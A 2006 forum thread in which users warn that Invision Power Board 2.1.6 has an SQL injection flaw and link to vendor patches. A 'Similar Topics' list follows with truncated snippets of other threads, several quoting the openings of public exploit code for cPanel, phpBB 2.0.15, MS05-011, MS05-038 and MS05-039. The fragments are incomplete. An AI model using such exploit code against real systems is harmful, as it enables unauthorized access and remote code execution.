echo.defender
Jul 1 2006, 04:13 PM
| | Invision Power Board v2.1.6 © 2006 IPS, Inc.
This is what it is written on the bottom of the board.
Not so long ago, i was surfing somewhere, (i wont say where) and i discovered a "sql injection"exploit, a perl script.
QUOTE(step28 in the hack) 28. Reload and click on the username to the admin. You are now logged in as an ADMIN!!!
Admins, pm to receive the link where i found this.
with this hack, you can log in with any user without his pass.
It's really easy to do, you just need PERL, Opera webbrowser and 3 minutes fo your life...
|
Reply
Albus Dumbledore
Jul 1 2006, 06:12 PM
this is why IPB has recently sent out a new update for this version of 2.1.6 http://forums.invisionpower.com/index.php?showtopic=219126is the update in which they are talkng about and here is another IPB Error that was released yesterday... which people need to upgrade on http://forums.invisionpower.com/index.php?showtopic=220787it talks about uploading avatars that will cause cross site scripting...
Reply
echo.defender
Jul 1 2006, 06:50 PM
QUOTE(Albus Dumbledore @ Jul 1 2006, 06:12 PM)  this is why IPB has recently sent out a new update for this version of 2.1.6 http://forums.invisionpower.com/index.php?showtopic=219126is the update in which they are talkng about and here is another IPB Error that was released yesterday... which people need to upgrade on http://forums.invisionpower.com/index.php?showtopic=220787it talks about uploading avatars that will cause cross site scripting... Yay a good administrator in a forum! thats rare! lol
Reply
delivi
Jul 1 2006, 10:39 PM
Thanks dude this would have become a serious proble for the forumers. This will alert all th forum admins here and they'll definetly update. If any one of you've been attacked with this exploit then, report it here.
Reply
echo.defender
Jul 2 2006, 03:03 AM
QUOTE(delivi @ Jul 1 2006, 10:39 PM)
Thanks dude this would have become a serious proble for the forumers. This will alert all th forum admins here and they'll definetly update. If any one of you've been attacked with this exploit then, report it here.
i did my good action of the day lol
Reply
uiop
Jul 2 2006, 10:14 AM
Security exploits like this make me nervous. I used to run an old version of IPB (I only purchased one year or so of updates), but decided to quit using it because of all the new security vulnrabilities. Are these forums updated?
Reply
echo.defender
Jul 2 2006, 02:52 PM
QUOTE(Albus Dumbledore @ Jul 1 2006, 06:12 PM) this is why IPB has recently sent out a new update for this version of 2.1.6 http://forums.invisionpower.com/index.php?showtopic=219126is the update in which they are talkng about and here is another IPB Error that was released yesterday... which people need to upgrade on http://forums.invisionpower.com/index.php?showtopic=220787it talks about uploading avatars that will cause cross site scripting... 
Reply
Similar Topics
Keywords : attention, ipb, users, admin, important, exploit, discovered
- Another New Exploit And One A Few Weeks Ago, We Are All At Risk From These
A DNS exploit and a clipboard expload believe it or not! (0)
Hackers Hijack A Half-million Sites: Phpbb Forum Users Must Read
(8) Since January, hackers have hit hit over 500,000 website, with everything you could possible
imagine; viruses, trojans, malware etc etc. As for the types of websites, sadly to say, these
websites who are getting hit are running PHPBB forum and the worse part is htey don't mention
which version of the phpbb forums are getting hack. So it is safe to say any version below 3.0 is
hackable and maybe even 3.0 itself. As for some of the stuff that is being transmitted are old and
new, but one trojan has been identified and it is the Zlob Trojan or rather variations to th....
Is There An Exploit In Vista Home Premium To Make Firefox Permanant Default Browser?
(4) I just got a new laptop, and of course it's loaded with vista. Everything works awesomly!
(my last PC was from 2001, BIG DIFF.) But the damned thing compulsivly and automatically sets
Internet Explorer to my default browser and won't let me change certain things which browsers
will typically handle. 've manually changed it so Firefox handles all the stuff except HTTPS
and what not (CANNOT CHANGE W/O HACK!), but IE just bumps in every time I want to click a link
from a non-browser based file /sad.gif" style="vertical-align:middle" emoid=":(" border="....
New Security Hole Discovered In Excel
(0) Well I have to same I am bit surprise on this security flaw especially what it can do; in which all
a user has to do is open a malicious Excel document and it allows the hackers to execute remote code
on to your system. As far as how wide spread this vulnerability is, it hits every excel software
from Excel 2000 to Excel 2003 SP2, and it also includes the Mac Version of Excel 2004 as well. OF
course with the disappointment of Office 2007 by some people will still be running the 2003 versions
on their computers. Right now the attacks are minimal and the question for t ....
Quicktime Zero Day Exploit News And Updates
(1) On monday it was reported that Quicktime 7.2 and 7.3 versions come with a new exploit in which
malware could on to a person's computer through streaming videos. They only mention that XP and
Vista are the only affect systems and no word came about on the Mac operating system. They mention
that a buffer overflow bug was made in which it "contains a stack buffer overflow vulnerability in
the way Quicktime handles the RTSP Content-Type header." For those who don't know what RTSP is,
RTSP is the Real-Time Streaming Protocol which apple uses for its QuickTime softw....
Hole In Microsoft Messenger Program Requires A Immediate Update
For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger (0) SOURCE Well it seems that Microsoft found a huge hole in MSN Messenger that was bad enough that
they want people to upgrade to the current Messenger which is Live 8.1 or something like that. As
for details on the problem they just said the following, "..which let hackers embed malicious code
in Web chat invitations to users." and that they found this problem in "6.2, 7.0 and 7.5, as well as
Windows Live Messenger 8.0." Although it was interesting to know that people were actually
complaining about Live Messenger being a resource hog, well the last time I check msn w....
Mcafee Lets Users Download Rootkit Program For Free
(2) Since the beginning of 2007 a lot of the security reports I have been reading have mentioning about
hackers using rootkits to get into people's computers. Google defines a rootkit as a set of
programs used to hack into a system and gain administrative-level access. Once a program has gained
access, it can be used to monitor traffic and keystrokes; create a backdoor into the system for the
hacker's use; alter log files; attack other machines on the network; and alter existing system
tools to circumvent detection. Rootkits are an extreme form of System Modificatio....
Interesting New Ie - Firefox Bug ( A Must Read Asap)
FF 2.0.02 and up users need to know about this (3) Well it has finally happen and strangely enough I didn't really think about it until now, but it
seems a security team found a very high level bug that requires both Internet Explorer 7 and
Modzilla Fire Fox. This is the jist of the bug; QUOTE The root of the matter is a Firefox
uniform resource identifier (URI) that allows Web sites to force Firefox to launch with the
"firefoxurl://" URI, Secunia reported. The way in which the URI handler is registered by Firefox
causes any parameter to be passed from IE (or another application) to Firefox when the "firefoxurl....
Security Guidelines For Internet Users
(6) Security Guidelines for Internet Users 1. Install an anti-virus software, you can free ones like
AVG Free . Ensure that it's regularly updated - this is of the utmost importance. 2.
Anti-virus software is not enough, the security can be tightened using a firewall software which
will help you prevent unauthorized incoming and outgoing communications from your computer while
connected to the Internet. 3. Disconnect your computer from the Internet when not in use. The
longer you are connected to the Internet, the more opportunity you give for persons to gain un....
Skype & P2p Users - Beware About These Following Worms
(2) With the Skype worm it a simple process of your computer getting infected the worm grabs all the
emails that your skype account has and sends a Instant message to click on this which also downloads
a trojan so other malicious software can installed on that infected computer. Also a person is
directed at least 8 which in the most likely case are scam sites to of course get that person's
info, but so far it hasn't cost any real damage like some of the other attacks skype has seen in
the past. SOURCE Here As well all know everyone is in the P2P since napster an....
Prank Phone Virus That Can Kills Sends Pakistan Mobile Users Into Hysteria
(0) Although not a big secuirty risk more like something interesting about what human mind viruses can
do ot a person once they recieve a message. On friday pretty much all hell broke loose in Pakistan
when people start recieving, hear, readying about a message that a Virus sen through a mobile phone
will kill people and so every mobile user in Pakinstan went into a craze and cllaed their providers
to see whats going on. The message alos mention that 20 people have died so far, of course they
make mention about the movie "The Ring" in which once a person watched this kil....
Zero-day Firefox Exploit
(5) Link to Article: http://news.com.com/Hackers+claim+zero-day..._3-6121608.html Thought this was
interesting. Really caught me offgaurd, didn't expect such a huge flaw on a GPL based program.
Whats even more scary is they said they have about 30 other flaws found.......
Cpanel Exploit
security hole in cPanel to hack the servers of a hosting company (8) A pair days ago I read this new on Slashdot: cPanel Exploit Used to Circulate IE Exploit
QUOTE "In a dangerous combination of unpatched exploits, hackers have used a previously
undiscovered security hole in cPanel to hack the servers of a hosting company and use hundreds of
hijacked sites to infect Internet Explorer users with malware using the unpatched VML exploit.
cPanel, whose hosting automation software is used by many large hosting companies, has issued a fix.
It's a local exploit, meaning the attacker must control a cPanel account on the target hosti....
Phishers Target Google Gmail Users
Be Careful GMail Users (12) QUOTE IT security experts warned today of a "widespread phishing email campaign" that tries to
swindle unwary recipients by pretending to offer a cash prize from Gmail, Google's popular free
email service. The emails claim that the recipient has been randomly selected for a $500 cash
prize, and that the money can be paid automatically if they click on the embedded web link. Part of
the email reads as follows: 'You won $500! Gmail congratulates you!
CONGRATULATIONS! YOU WON $500! Gmail gives members random cash prizes. Today....
Windows Xp Pro Exploit: Permission Setup Allows Access To Task Manager During Login
even if permissions deny this abiltity. (1) A friend of mine was temporarily banned from the computers at my school a while ago after he
accidentially found a way into Task Manager, which is disabled on our network. He has had his
permissions restored now, but has no idea why he got banned in the first place. However, recently he
explained what he did to me, and I tested it. I soon found out that, by accident, we had both
discovered that there is a Security Exploit in networking Windows XP Professional. The exploit is
to do with network permissions. Windows XP recieves the permission data from the network as soon....
Firefox Exploit
(0) QUOTE Earlier this week, I blogged about a site doing a bunch of different exploits, depending
on what you are running. One of the things the site will do is detect if you have Firefox, and
attempt to exploit it, using the InstallVersion.compareTo() vulnerability. Read More with
images Already found to be copying and pasting. Take this time to review our forum rules. Warning.
....
Firefox's Answer To Ie's Phishing Filter?
users of the sacred browser can breathe once more! (5) SiteAdvisor - Firefox's Answer To IE's Phishing Filter? A site-warning plugin
for ie and firefox Name: Site Advisor Url: http://siteadvisor.com Download:
http://www.siteadvisor.com/download/ff.html Rating: 9.75/10 Improvements: Not all sites are on
their database but many of the popular ones are so index all webistes. SiteAdvisor is a simple and
easy to install extension created for firefox which checks to see if the site you are on is "bad"
from its database of urls. Once the results have reached your browser a notificatio....
Popular Applications Are Creating Holes In Your Os
photoshop and aol users were most at risk (21) Popular Applications Are Creating Holes In Your OS Nearly every computer owner nowadays
knows how to keep their computer safe by running regualar virus scans and keeping spyware scanners
up to date. Well researchers at Prinston University say that this is not enough. They have found
many popular applications which open doors up to allow various attacks. Among the discovered
culprits were Adobe Photoshop and AOL Instant Messengar . Fortuneately, these products which had
the worst written code out of all those which were found, have fixed their code. Earlier ....
Serious Wmf Windows Exploit
No-one is safe right now (16) This has blown up big time in the last 3 days: http://www.f-secure.com/weblog/ ....
S Si/e Found In Source Of Word-created Web Pages!
URGENT ATTENTION REQUIRED if using word! (8) Major Security Issue Exists in Source of Word-Created Web pages! This is an URGENT
news bulletin to anyone who owns a website!!! Problem: A serious security exploit
exists in the source of these documents that allows anyone who is able to view the source of the
page to gain personally identifiable information relevant to the document. This is due to Microsoft
Word's method of dealing with web pages - Microsoft Word, despite being able to create Web
Pages/Templates, does not actually understand their format, and so it stores the Word progra....
Latest Ie Exploit
does anyone still use this browser? (10) For Internet Explorer users, please note that there is a new exploit in the wild that is capable of
compromising a fully patched and updated WinXP machine:
http://www.eweek.com/article2/0,1759,18917...3119TX1K0000594 Microsoft has not released a fix yet.
From the article: QUOTE IE users should immediately disable Active Scripting via the Tools >
Internet Options > Security tab > Custom Level feature. Firefox and other alternative web
browsers are not affected. You would have to be tricked into going to a malicious website to have
any chance of being affecte....
[exploit] Phpbb <=2.0.12 Vulnerability.
How to be Admin on phpBB in Simple steps (2) Another vulnerability in PHPbb based forums that can be used to easily gain any user level access to
the forum. Even the admin account is not not secure with the default setup. Click Here for more
details about -"How to be Admin on phpBB in Simple steps!" And here is the Homepage of
PHPbb and click here to download the latest version.....
Online Scams Exploit Katrina Disaster
(10) In the wake of hurricane Katrina, several online scams have begun to circulate the Internet,
according to several security firms. Sophos warned users on Thursday not to open a malware-Infected
e-mail posing as news on the disaster. Possible subject lines of the e-mail could be QUOTE
"Re: g8 Tropical storm flooded New Orleans", "Re: g7 80 percent of our city underwater", and "Re:
q1 Katrina killed as many as 80 people". The group said there could be additional variants.
BetaNews on Thursday morning had received a variant of the above e-mails, however it app....
[exploit] Cpanel Versions Below And Equal To 9x
(7) Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution
vulnerability. /* cPanel */ //headers #include //In/Out #include //sockets functions
#include //memory functions #include //strlen,strcat,strcpy #pragma comment(lib,"ws2_32.lib")
//for compile with dev-c++ link to "libws2_32.lib" #define Port 2082 //port for connect to cPanel
#define SIZE 1024 //buffer size to receive the data /*connect host:port*/ SOCKET Conecta(char
*Host, short puerto) { /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//l....
[exploit] Microsoft Server Message Block
(SMB) Remote Exploit (MS05-011) (0) Microsoft Server Message Block (SMB) Remote Exploit (MS05-011) /* * Windows SMB Client
Transaction Response Handling * * MS05-011 * CAN-2005-0045 * * This works against Win2k * *
cybertronic gmx net * http://www.livejournal.com/users/cybertronic/ * * usage: * gcc -o mssmb_poc
mssmb_poc.c * ./mssmb_poc * * connect via \\ip * and hit the netbios folder! * *
***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690, * 0x00000000) * PAGE_FAULT_IN_NONPAGED_AREA *
* The Client reboots immediately * * Technical Details: * ----------------- * * The driver MRXSMB.S....
[exploit] Microsoft Internet Explorer Com Objects
File Download Exploit (MS05-038) (0) Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
/*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11
http://www.donews.net/zwell zwell@sohu.com Some code belongs to Lion(cnhonker), regards to him.
This code tested on Windows 2003 -----------------------------------------------*/ #include
#include #pragma comment(lib, "ws2_32") // Use for find the ASM code #define PROC_BEGIN __asm
_emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm
_emit 0x90\....
[exploit] Phpbb 2.0.15 "viewtopic.php"
Remote PHP Code Execution Exploit (3) phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit #!/usr/bin/pyth0n print
"\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none." import sys from urllib2 import Request, urlopen from
urlparse import urlparse, urlunparse from urllib import quote as quote_plus INITTAG = ' '
ENDTAG = ' ' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd
,'chr(%d)'%ord(cmd )) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += ....
[exploit] Microsoft Windows 2000 Plug And Play
Universal Exploit (0) Microsoft Windows 2000 Plug and Play Universal Remote Exploit (MS05-039) /* Windows 2000
universal exploit for MS05-039 -\x6d\x35\x6c\x30\x6e\x6e\x79- */
#include #include #include #include #include #include #include #pragma comment(lib,
"mpr") #pragma comment(lib, "Rpcrt4") BYTE Data1 =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x0....
[exploit] Microsoft Windows Remote Desktop Dos
(0) Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041) // Windows XP SP2
'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy
security-protocols com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) :
./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // //
This program is free software; you can redistribute it and/or modify it under // the terms of the
GNU General Public License version 2, 1991 as published by // the Free Software Foundation.
s_block_start("packet_1....
[exploit] Microsoft Windows 2000 Plug And Play
(1) Microsoft Windows 2000 Plug and Play Universal Remote Exploit #2 (MS05-039) /*
HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 * * Copyright © 2005 houseofdabus. * * (MS05-039)
Microsoft Windows Plug-and-Play Service Remote Overflow * Universal Exploit + no crash shellcode * *
.:: ::. * * --------------------------------------------------------------------- * Description: * A
remote code execution and local elevation of privilege * vulnerability exists in Plug and Play that
could allow an * attacker who successfully exploited this vulnerability to take * complete con....
Looking for attention, ipb, users, admin, important, exploit, discovered
|
*RANDOM STUFF*
*SIMILAR VIDEOS*
Searching Video's for attention, ipb, users, admin, important, exploit, discovered
*MORE FROM TRAP17.COM*
|
advertisement
|
|
